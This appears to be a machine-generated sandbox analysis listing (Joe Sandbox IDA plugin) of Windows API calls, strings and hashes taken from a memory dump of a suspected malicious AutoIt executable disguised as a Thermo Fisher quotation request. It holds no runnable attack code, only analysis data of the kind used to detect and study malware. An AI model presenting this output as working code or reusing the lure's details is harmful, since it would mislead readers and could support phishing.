                                                              • GetSysColor.USER32(0000000F), ref: 0066D5D3
                                                              • CreateSolidBrush.GDI32(?), ref: 0066D5D8
                                                              • GetSysColor.USER32(00000011), ref: 0066D5F0
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0066D5FE
                                                              • SelectObject.GDI32(?,00000000), ref: 0066D60F
                                                              • SetBkColor.GDI32(?,00000000), ref: 0066D618
                                                              • SelectObject.GDI32(?,?), ref: 0066D625
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0066D644
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0066D65B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0066D670
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0066D698
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0066D6BF
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0066D6DD
                                                              • DrawFocusRect.USER32(?,?), ref: 0066D6E8
                                                              • GetSysColor.USER32(00000011), ref: 0066D6F6
                                                              • SetTextColor.GDI32(?,00000000), ref: 0066D6FE
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0066D712
                                                              • SelectObject.GDI32(?,0066D2A5), ref: 0066D729
                                                              • DeleteObject.GDI32(?), ref: 0066D734
                                                              • SelectObject.GDI32(?,?), ref: 0066D73A
                                                              • DeleteObject.GDI32(?), ref: 0066D73F
                                                              • SetTextColor.GDI32(?,?), ref: 0066D745
                                                              • SetBkColor.GDI32(?,?), ref: 0066D74F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: 67af19573410f095f92a0255d49823b640c67a80a8f97b34de9d478b00a9fcc5
                                                              • Instruction ID: 234e598a752af2ddf33a6fcfe41cee884a61b9fe522dfd388b3db6a6e263e140
                                                              • Opcode Fuzzy Hash: 67af19573410f095f92a0255d49823b640c67a80a8f97b34de9d478b00a9fcc5
                                                              • Instruction Fuzzy Hash: 66511A71900218BFDF10AFA8DC48EEE7BBAEF48324F105615F915AB2E1D7759A409F60
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0066B7B0
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0066B7C1
                                                              • CharNextW.USER32(0000014E), ref: 0066B7F0
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0066B831
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0066B847
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0066B858
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0066B875
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0066B8C7
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0066B8DD
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0066B90E
                                                              • _memset.LIBCMT ref: 0066B933
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0066B97C
                                                              • _memset.LIBCMT ref: 0066B9DB
                                                              • SendMessageW.USER32 ref: 0066BA05
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0066BA5D
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0066BB0A
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0066BB2C
                                                              • GetMenuItemInfoW.USER32(?), ref: 0066BB76
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0066BBA3
                                                              • DrawMenuBar.USER32(?), ref: 0066BBB2
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0066BBDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: 14184b42e999b2320b1ead7288966773ebd926bae18175dd1bd5ff5717d0d9d7
                                                              • Instruction ID: 389884f7d3ed9df16bbd2e6d2ec0de340d1dfc8c3ba4523bd3e77b430ce99fcb
                                                              • Opcode Fuzzy Hash: 14184b42e999b2320b1ead7288966773ebd926bae18175dd1bd5ff5717d0d9d7
                                                              • Instruction Fuzzy Hash: 68E18C75900218EBDB209F65CC84EEE7B7AFF45714F10925AF919EB291DB708A81CF60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Foreground
                                                              • String ID: ACTIVE$ALL$CLASS$H+k$HANDLE$INSTANCE$L+k$LAST$P+k$REGEXPCLASS$REGEXPTITLE$T+k$TITLE
                                                              • API String ID: 62970417-3407795192
                                                              • Opcode ID: 5acde4c75eb9d5a4b13e0929d77020f38bfd7defbdeeb9fdb474be957c09d43b
                                                              • Instruction ID: 193d40bc319613b1d858132bd3be7845dd9be8b523c5611307a1d833c8c7b43f
                                                              • Opcode Fuzzy Hash: 5acde4c75eb9d5a4b13e0929d77020f38bfd7defbdeeb9fdb474be957c09d43b
                                                              • Instruction Fuzzy Hash: E3D1C8301086439BCB48EF20C8A19DABBB7BF54354F108A1DF459576A2DB30E9DACBD5
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 0066778A
                                                              • GetDesktopWindow.USER32 ref: 0066779F
                                                              • GetWindowRect.USER32(00000000), ref: 006677A6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00667808
                                                              • DestroyWindow.USER32(?), ref: 00667834
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0066785D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066787B
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006678A1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 006678B6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006678C9
                                                              • IsWindowVisible.USER32(?), ref: 006678E9
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00667904
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00667918
                                                              • GetWindowRect.USER32(?,?), ref: 00667930
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00667956
                                                              • GetMonitorInfoW.USER32 ref: 00667970
                                                              • CopyRect.USER32(?,?), ref: 00667987
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 006679F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: e674579c021cf67ea3405fe324b2b072fc43b986fffcc31501ad82b7783ddfd0
                                                              • Instruction ID: 4f32c16a822f0310c1ac5046ff71d7bd45102d7c577f437253dbc1ddb7fbc59b
                                                              • Opcode Fuzzy Hash: e674579c021cf67ea3405fe324b2b072fc43b986fffcc31501ad82b7783ddfd0
                                                              • Instruction Fuzzy Hash: 6FB1AE71608301AFDB44DF64C848B6ABBE6FF88314F008A1DF5999B291D770EC45CBA6
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00646CFB
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00646D21
                                                              • _wcscpy.LIBCMT ref: 00646D4F
                                                              • _wcscmp.LIBCMT ref: 00646D5A
                                                              • _wcscat.LIBCMT ref: 00646D70
                                                              • _wcsstr.LIBCMT ref: 00646D7B
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00646D97
                                                              • _wcscat.LIBCMT ref: 00646DE0
                                                              • _wcscat.LIBCMT ref: 00646DE7
                                                              • _wcsncpy.LIBCMT ref: 00646E12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: 20a49acb5b54f67758a62c2a8444904eed0ddc3902476247c272b5e3a81b4541
                                                              • Instruction ID: 77392964bfa4e0096c8bd7f27020e5d1e78acea797c183761e408c0e31d7ca14
                                                              • Opcode Fuzzy Hash: 20a49acb5b54f67758a62c2a8444904eed0ddc3902476247c272b5e3a81b4541
                                                              • Instruction Fuzzy Hash: BE41F871A04210BBEB40AB64DC47EFF77BFEF52710F140069F901E6182EB749A0197AA
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0061A939
                                                              • GetSystemMetrics.USER32(00000007), ref: 0061A941
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0061A96C
                                                              • GetSystemMetrics.USER32(00000008), ref: 0061A974
                                                              • GetSystemMetrics.USER32(00000004), ref: 0061A999
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0061A9B6
                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0061A9C6
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0061A9F9
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0061AA0D
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 0061AA2B
                                                              • GetStockObject.GDI32(00000011), ref: 0061AA47
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0061AA52
                                                                • Part of subcall function 0061B63C: GetCursorPos.USER32(000000FF), ref: 0061B64F
                                                                • Part of subcall function 0061B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0061B66C
                                                                • Part of subcall function 0061B63C: GetAsyncKeyState.USER32(00000001), ref: 0061B691
                                                                • Part of subcall function 0061B63C: GetAsyncKeyState.USER32(00000002), ref: 0061B69F
                                                              • SetTimer.USER32(00000000,00000000,00000028,0061AB87), ref: 0061AA79
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: 7b0e472805ae5ee7d118dc6d5bc9fdb6c987a7c4a15759bfa393a526d8cef9af
                                                              • Instruction ID: f07c299d0b567f5b6996949695cbce365947f6c89a1af56c22b9c2e886724525
                                                              • Opcode Fuzzy Hash: 7b0e472805ae5ee7d118dc6d5bc9fdb6c987a7c4a15759bfa393a526d8cef9af
                                                              • Instruction Fuzzy Hash: 45B16A71A0020AAFDB14DFA8CC45BEE7BB6FF09314F154219FA15AA2D0DB74E891CB51
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00663735
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0069DC00,00000000,?,00000000,?,?), ref: 006637A3
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006637EB
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00663874
                                                              • RegCloseKey.ADVAPI32(?), ref: 00663B94
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00663BA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              • Opcode ID: 0f815ca37179aa6a4d53e5688fa84ab526e0a359102faf826c0be729acd30834
                                                              • Instruction ID: d63b695e9170c4804661e0943b51f01a8c7ca0df3524e7d8f3aa058eccbb0828
                                                              • Opcode Fuzzy Hash: 0f815ca37179aa6a4d53e5688fa84ab526e0a359102faf826c0be729acd30834
                                                              • Instruction Fuzzy Hash: 97027E752006119FCB58DF14C851A6AB7E6FF88720F04855DF98A9B3A2DB30ED41CF95
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00666C56
                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00666D16
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                              • API String ID: 3974292440-719923060
                                                              • Opcode ID: 71373f35e05e8f8237e3e93286ec1e8f5b378ca8e85894e72a459fdbfb4844ec
                                                              • Instruction ID: f9eb2ebe232c5c4e4f2a9f625524a15877daf7b7a29393651c94a3e7d506bbf8
                                                              • Opcode Fuzzy Hash: 71373f35e05e8f8237e3e93286ec1e8f5b378ca8e85894e72a459fdbfb4844ec
                                                              • Instruction Fuzzy Hash: 1BA190702042429FCB58EF20D851AAAB7A7BF54310F14496CB9A65B3D2DF31ED46CB85
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0063CF91
                                                              • __swprintf.LIBCMT ref: 0063D032
                                                              • _wcscmp.LIBCMT ref: 0063D045
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0063D09A
                                                              • _wcscmp.LIBCMT ref: 0063D0D6
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0063D10D
                                                              • GetDlgCtrlID.USER32(?), ref: 0063D15F
                                                              • GetWindowRect.USER32(?,?), ref: 0063D195
                                                              • GetParent.USER32(?), ref: 0063D1B3
                                                              • ScreenToClient.USER32(00000000), ref: 0063D1BA
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0063D234
                                                              • _wcscmp.LIBCMT ref: 0063D248
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0063D26E
                                                              • _wcscmp.LIBCMT ref: 0063D282
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                              • String ID: %s%u
                                                              • API String ID: 3119225716-679674701
                                                              • Opcode ID: 1503dbe9a6825a4685fbc130903cb70ab884340dcb5f3c64c7a8e4ded77e3fa0
                                                              • Instruction ID: 7d1f02d068c9f68bad6d5302f7accd1f3be3ff569f600935e6bcf790d962a474
                                                              • Opcode Fuzzy Hash: 1503dbe9a6825a4685fbc130903cb70ab884340dcb5f3c64c7a8e4ded77e3fa0
                                                              • Instruction Fuzzy Hash: 3DA1D071604706AFC714DF64D884FEBB7AAFF44310F008619FA5992280DB30EA45CBE1
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0063D8EB
                                                              • _wcscmp.LIBCMT ref: 0063D8FC
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0063D924
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0063D941
                                                              • _wcscmp.LIBCMT ref: 0063D95F
                                                              • _wcsstr.LIBCMT ref: 0063D970
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0063D9A8
                                                              • _wcscmp.LIBCMT ref: 0063D9B8
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0063D9DF
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0063DA28
                                                              • _wcscmp.LIBCMT ref: 0063DA38
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0063DA60
                                                              • GetWindowRect.USER32(00000004,?), ref: 0063DAC9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 1788623398-1539354611
                                                              • Opcode ID: e7a041cfc8526e0064660b75d08ad1d5706b42a5dbdba3b56e550ad6ab004fc8
                                                              • Instruction ID: ed0613668f6a070484d1ebcb03e12ce8e723b38680ac7c7acab3cdda76bb37ef
                                                              • Opcode Fuzzy Hash: e7a041cfc8526e0064660b75d08ad1d5706b42a5dbdba3b56e550ad6ab004fc8
                                                              • Instruction Fuzzy Hash: DF81BF710083059BDB05DF10E985FAA7BEAEF84314F04856AFD8A9A1D6DB30DD45CBE1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              • API String ID: 1038674560-1810252412
                                                              • Opcode ID: a50ba9178d177449004b66d403101d9b8b80039bc6560c33a61d4fd017dca253
                                                              • Instruction ID: 36e6f37b68f55b9d6967e59e29e161274dcf8495bad2804b46a0184c81b31706
                                                              • Opcode Fuzzy Hash: a50ba9178d177449004b66d403101d9b8b80039bc6560c33a61d4fd017dca253
                                                              • Instruction Fuzzy Hash: A731C171684206A6DB58FB50ED63EEEB3B79F20754F21012DF402710D1EF61AE54CB99
                                                              APIs
                                                              • LoadIconW.USER32(00000063), ref: 0063EAB0
                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0063EAC2
                                                              • SetWindowTextW.USER32(?,?), ref: 0063EAD9
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0063EAEE
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0063EAF4
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0063EB04
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0063EB0A
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0063EB2B
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0063EB45
                                                              • GetWindowRect.USER32(?,?), ref: 0063EB4E
                                                              • SetWindowTextW.USER32(?,?), ref: 0063EBB9
                                                              • GetDesktopWindow.USER32 ref: 0063EBBF
                                                              • GetWindowRect.USER32(00000000), ref: 0063EBC6
                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0063EC12
                                                              • GetClientRect.USER32(?,?), ref: 0063EC1F
                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0063EC44
                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0063EC6F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                              • String ID:
                                                              • API String ID: 3869813825-0
                                                              • Opcode ID: 58540b8a029b7ac7d2c92eec1d1c83d4720e7f41e6c4a581c67d24e0b2097118
                                                              • Instruction ID: cf3aaefdf124c08a1d6707777960c7468f56c6785b0229ba171537a539ee6915
                                                              • Opcode Fuzzy Hash: 58540b8a029b7ac7d2c92eec1d1c83d4720e7f41e6c4a581c67d24e0b2097118
                                                              • Instruction Fuzzy Hash: E5512071900709EFDB219FA8CE85FAEBBF6FF04704F004618E596A26E0D775A945CB60
                                                              APIs
